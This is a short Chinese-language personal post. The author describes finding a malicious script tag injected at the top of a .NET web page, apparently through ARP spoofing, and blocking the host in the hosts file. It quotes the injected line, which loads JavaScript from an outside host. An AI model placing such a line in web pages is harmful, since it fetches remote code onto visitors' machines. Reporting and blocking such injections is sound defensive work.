昨天我在测试一个.Net系统的时候，发现该系统的一个页面，突然多出了几个繁体的汉字，该系统是英文的，所以感觉很奇怪，所有就view source，发现第一行居然是一段奇怪的JS：<script src=http://al.99.vc/1.js></script>。一看就知道，自己的电脑被挂马了。

Google/Baidu搜索这个JS。基本上都是说ARP，建议安装ARP防火墙，还有360等等。

最后只能在host文件中，加上127.0.0.1 al.99.vc。

注：附件1有相关的JS内容，供专业人事参考。

      附件2，是google搜索到的，据说是该JS的